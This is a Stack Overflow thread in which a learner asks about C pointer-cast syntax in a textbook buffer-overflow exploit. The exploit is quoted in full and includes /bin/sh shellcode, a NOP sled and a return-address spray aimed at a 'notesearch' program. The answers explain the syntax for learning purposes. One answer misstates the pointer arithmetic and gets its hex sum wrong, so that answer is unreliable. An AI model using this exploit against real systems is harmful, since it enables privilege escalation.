# How does C do arithmetic to the left of '='?

Tags: c

I'm working through "The art of exploitation", and there's the following C program that I don't fully understand the syntax of.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}
```

Now, inside the for loop, there's one line which, I guess, stores the return address in buffer+i? But where does that value get saved? buffer or i? How does this code even work?

Comment: I'm not sure but i think `buffer + i` is the same thing as `buffer[i]`

Comment: @GeestWagen Nope, `buffer + i` means `&(buffer[i])`.

Comment: @GeestWagen `buffer + i` is the same thing as `&buffer[i]`. `*(buffer + i)` would be the same thing as `buffer[i]`.

Comment: Buffer is a character pointer. It stores the ret value in consecutive locations. Check pointer concept in c. https://www.geeksforgeeks.org/pointers-in-c-and-c-set-1-introduction-arithmetic-and-array/

Comment: Why all the casts?

Comment: For simplicity: the left-hand side of the `=` (assignment operator) determines the memory location where the result of the right-hand side must be stored.

Comment: @klutt, the casts are to turn the address of a char into the address of an int. Note that the loop increments with 4, apparently the sizeof an int on the platform (so: not portable).

Comment: Non-portability is not that much of an issue in code containing shellcode, but that sure would be clearer with `i += sizeof(unsigned int)`.

Answer (score 3, accepted):

For any pointer or array `p` and index `i`, the expression `*(p + i)` is *exactly* equal to `p[i]`. From this follows that `p + i` is a pointer to the `i`:th element of `p`, which is then `&p[i]`.

Assuming you're asking about `*((unsigned int *)(buffer+i))`, if we split it into its separate parts we have

`buffer + i` which from above we now know is equal to `&buffer[i]`.

Then we have `(unsigned int *)` which is a plain cast, which tells the compiler to treat `&buffer[i]` as a pointer to an `unsigned int`.

Then lastly we have the dereference of that pointer, which yields the value being pointed to.

So the assignment writes the `int` value in `ret` to where `&buffer[i]` is pointing.

---

It could also help if we rewrite this using temporary variables:

```
char *buffer_ptr = buffer + i;
unsigned int *int_ptr = (unsigned int *) buffer_ptr;
int_ptr[0] = ret;
```

Answer (score 2):

`buffer` is a pointer to char (`char *`).
In the following line, the developer casts buffer into a pointer to int, then performs pointer arithmetic by adding an offset of `i` integers, then deference this offset pointer and writes to that location the value stored in `ret`.

```
  *((unsigned int *)(buffer+i)) = ret;
```

Example: assume int is 4byte long, and assume `buffer` points to address 0x100 (buffer = 0x100).
assume `i` = 10;

`buffer+i` then points to 0x100+10*(size of int) = 0x100+10*4 = 0x10E

`ret` is then written into the memory at address 0x10E

Answer (score 2):

```
*((unsigned int *)(buffer+i)) = ret;
```

means

```
*((unsigned int*)(&(buffer[i]))) = ret;
```

Answer (score 1):

In the code

```
*((unsigned int *)(buffer+i)) = ret;
```

`buffer` is of type `char *`, so pointer arithmetic (`buffer+i`) works using the type it points to, i.e, `char`. Also, while deferenencing the address held in `buffer`, it's of type `char`, as `buffer` is defined as a pointer to a `char` type.

Now, the address it produces as a result of `buffer +i`, is of type `char *`, i.e., to hold a `char` type. But, we want to store an `unsigned int` value (the value of `ret` variable), so there are two things done in the code:

- `i` is increased by `4` in the loop (assuming the size of an `unsigned int` in 4 bytes)
- the address, is cast to `unsigned int *`.

Then, the address is dereferenced to indicate the value at that address, and the `unsigned int` value of `ret` is stored there.